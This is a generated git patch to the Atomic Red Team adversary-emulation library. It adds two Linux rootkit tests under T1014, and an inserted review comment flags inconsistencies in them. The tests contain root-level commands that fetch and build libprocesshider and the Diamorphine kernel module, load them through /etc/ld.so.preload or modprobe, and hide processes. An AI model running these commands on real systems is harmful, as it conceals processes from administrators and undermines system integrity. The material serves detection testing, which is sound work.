From 85ad8c995d7ccaadbbb8077eed893e404c8f244c Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator
Date: Tue, 2 Aug 2022 21:07:36 +0000
Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip]
---
 atomics/Indexes/Indexes-CSV/index.csv | 2 +
 atomics/Indexes/Indexes-CSV/linux-index.csv | 2 +
 atomics/Indexes/Indexes-Markdown/index.md | 2 +
 .../Indexes/Indexes-Markdown/linux-index.md | 2 +
 atomics/Indexes/index.yaml | 98 ++++++++++++++
 atomics/T1014/T1014.md | 124 ++++++++++++++++++
 6 files changed, 230 insertions(+)
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 7531aedb..7aaf6560 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -28,6 +28,8 @@ defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16
 defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
 defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
 defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
+defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
+defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh
 defense-evasion,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
 defense-evasion,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
 defense-evasion,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index a0170a84..a2b5299d 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -14,6 +14,8 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,11,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
 defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
 defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
+defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
+defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh
 defense-evasion,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
 defense-evasion,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
 defense-evasion,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 82abbff6..1f4ad974 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -43,6 +43,8 @@
 - [T1014 Rootkit](../../T1014/T1014.md)
 - Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
 - Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
+ - Atomic Test #3: dynamic-linker based rootkit (libprocesshider) [linux]
+ - Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine) [linux]
 - T1109 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.007 Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index 4e1e11eb..578a51fb 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -22,6 +22,8 @@
 - [T1014 Rootkit](../../T1014/T1014.md)
 - Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
 - Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
+ - Atomic Test #3: dynamic-linker based rootkit (libprocesshider) [linux]
+ - Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine) [linux]
 - T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
 - Atomic Test #1: Sudo usage [macos, linux]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 13a32253..375ad111 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -1712,6 +1712,104 @@ defense-evasion:
 sudo depmod -a
 name: sh
 elevation_required: true
+ - name: dynamic-linker based rootkit (libprocesshider)
+ auto_generated_guid: 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3
+ description: 'Uses libprocesshider to simulate rootkit behavior by hiding a
+ specific process name via ls.so.preload (see also T1574.006).
+
+ '
+ supported_platforms:
+ - linux
+ input_arguments:
+ repo:
+ description: Url of the github repo zip
+ type: String
+ default: https://github.com/gianlucaborello/libprocesshider/
+ rev:
+ description: Revision of the github repo zip
+ type: String
+ default: 25e0587d6bf2137f8792dc83242b6b0e5a72b415
+ library_path:
+ description: Full path of the library to add to ld.so.preload
+ type: String
+ default: "/usr/local/lib/libprocesshider.so"
+ dependency_executor_name: bash
+ dependencies:
+ - description: 'The preload library must exist on disk at specified location
+ (#{library_path})
+
+ '
+ prereq_command: 'if [ -f #{library_path} ]; then exit 0; else exit 1; fi;
+
+ '
+ get_prereq_command: |
+ mkdir -p /tmp/atomic && cd /tmp/atomic
+ curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd libprocesshider-#{rev}
+ make
+ cp libprocesshider.so #{library_path}
+ cp /usr/bin/ping /usr/local/bin/evil_script.py
+ executor:
+ command: |
+ echo #{library_path} | tee -a /etc/ld.so.preload
+ /usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"
+ cleanup_command: |
+ sed -i "\:^#{library_path}:d" /etc/ld.so.preload
+ rm -rf #{library_path} /usr/local/bin/evil_script.py /tmp/atomic
+ name: sh
+ elevation_required: true
+ - name: Loadable Kernel Module based Rootkit (Diamorphine)
+ auto_generated_guid: 0b996469-48c6-46e2-8155-a17f8b6c2247
+ description: 'Loads Diamorphine kernel module, which hides itself and a processes.
+
+ '
+ supported_platforms:
+ - linux
+ input_arguments:
+ repo:
+ description: Url of the diamorphine github repo
+ type: String
+ default: https://github.com/m0nad/Diamorphine/
+ rev:
+ description: Revision of the github repo zip
+ type: String
+ default: 898810523aa2033f582a4a5903ffe453334044f9
+ rootkit_path:
+ description: Path To rootkit
+ type: String
+ default: "/tmp/atomic/Diamorphine"
+ rootkit_name:
+ description: Module name
+ type: String
+ default: diamorphine
+ dependency_executor_name: bash
+ dependencies:
+ - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)
+
+ '
+ prereq_command: 'if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then
+ exit 0; else exit 1; fi;
+
+ '
+ get_prereq_command: |
+ mkdir -p /tmp/atomic && cd /tmp/atomic
+ curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd Diamorphine-#{rev}
+ make
+ sudo cp #{rootkit_name}.ko /lib/modules/$(uname -r)/
+ sudo depmod -a
+ executor:
+ command: |
+ sudo modprobe #{rootkit_name}
+ ping -c 10 localhost >/dev/null & TARGETPID="$!"
+ ps $TARGETPID
+ kill -31 $TARGETPID
+ ps $TARGETPID || echo "process ${TARGETPID} hidden"
+ cleanup_command: |
+ kill -63 1
+ sudo modprobe -r #{rootkit_name}
+ sudo rm -rf /lib/modules/$(uname -r)/#{rootkit_name}.ko /tmp/atomic
+ sudo depmod -a
+ name: sh
+ elevation_required: true
 T1109:
 technique:
 x_mitre_platforms:
diff --git a/atomics/T1014/T1014.md b/atomics/T1014/T1014.md
index 75bcea5a..f55e3b09 100644
--- a/atomics/T1014/T1014.md
+++ b/atomics/T1014/T1014.md
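Review bot: The Diamorphine dependency description says the module must exist at `#{rootkit_path}/#{rootkit_name}.ko`, but prereq_command tests `/lib/modules/$(uname -r)/#{rootkit_name}.ko` and no command ever references `rootkit_path`, so the documented and checked locations disagree; either drop the unused input or make get_prereq_command and prereq_command use it. The libprocesshider description reads `ls.so.preload` where the executor (correctly) edits `/etc/ld.so.preload`; the same typo is reproduced in the T1014.md hunk of this commit. The Diamorphine cleanup runs `kill -63 1` unconditionally, so a run in which modprobe failed still delivers a real-time signal to PID 1; guarding it, e.g. `lsmod | grep -q "^#{rootkit_name} " && kill -63 1`, avoids that. This index is generated, so the fixes belong in the T1014 atomic YAML it is built from rather than in this file.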
@@ -10,6 +10,10 @@ Rootkits or rootkit enabling functionality may reside at the user or kernel leve
 - [Atomic Test #2 - Loadable Kernel Module based Rootkit](#atomic-test-2---loadable-kernel-module-based-rootkit)
+- [Atomic Test #3 - dynamic-linker based rootkit (libprocesshider)](#atomic-test-3---dynamic-linker-based-rootkit-libprocesshider)
+
+- [Atomic Test #4 - Loadable Kernel Module based Rootkit (Diamorphine)](#atomic-test-4---loadable-kernel-module-based-rootkit-diamorphine)
+
@@ -129,4 +133,124 @@ sudo depmod -a
+
+
+
+## Atomic Test #3 - dynamic-linker based rootkit (libprocesshider)
+Uses libprocesshider to simulate rootkit behavior by hiding a specific process name via ls.so.preload (see also T1574.006).
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| repo | Url of the github repo zip | String | https://github.com/gianlucaborello/libprocesshider/|
+| rev | Revision of the github repo zip | String | 25e0587d6bf2137f8792dc83242b6b0e5a72b415|
+| library_path | Full path of the library to add to ld.so.preload | String | /usr/local/lib/libprocesshider.so|
+
+
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
+
+
+```sh
+echo #{library_path} | tee -a /etc/ld.so.preload
+/usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"
+```
+
+#### Cleanup Commands:
+```sh
+sed -i "\:^#{library_path}:d" /etc/ld.so.preload
+rm -rf #{library_path} /usr/local/bin/evil_script.py /tmp/atomic
+```
+
+
+
+#### Dependencies: Run with `bash`!
+##### Description: The preload library must exist on disk at specified location (#{library_path})
+##### Check Prereq Commands:
+```bash
+if [ -f #{library_path} ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```bash
+mkdir -p /tmp/atomic && cd /tmp/atomic
+curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd libprocesshider-#{rev}
+make
+cp libprocesshider.so #{library_path}
+cp /usr/bin/ping /usr/local/bin/evil_script.py
+```
+
+
+
+
+
+
+## Atomic Test #4 - Loadable Kernel Module based Rootkit (Diamorphine)
+Loads Diamorphine kernel module, which hides itself and a processes.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 0b996469-48c6-46e2-8155-a17f8b6c2247
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| repo | Url of the diamorphine github repo | String | https://github.com/m0nad/Diamorphine/|
+| rev | Revision of the github repo zip | String | 898810523aa2033f582a4a5903ffe453334044f9|
+| rootkit_path | Path To rootkit | String | /tmp/atomic/Diamorphine|
+| rootkit_name | Module name | String | diamorphine|
+
+
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
+
+
+```sh
+sudo modprobe #{rootkit_name}
+ping -c 10 localhost >/dev/null & TARGETPID="$!"
+ps $TARGETPID
+kill -31 $TARGETPID
+ps $TARGETPID || echo "process ${TARGETPID} hidden"
+```
+
+#### Cleanup Commands:
+```sh
+kill -63 1
+sudo modprobe -r #{rootkit_name}
+sudo rm -rf /lib/modules/$(uname -r)/#{rootkit_name}.ko /tmp/atomic
+sudo depmod -a
+```
+
+
+
+#### Dependencies: Run with `bash`!
+##### Description: The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)
+##### Check Prereq Commands:
+```bash
+if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```bash
+mkdir -p /tmp/atomic && cd /tmp/atomic
+curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd Diamorphine-#{rev}
+make
+sudo cp #{rootkit_name}.ko /lib/modules/$(uname -r)/
+sudo depmod -a
+```
+
+
+
+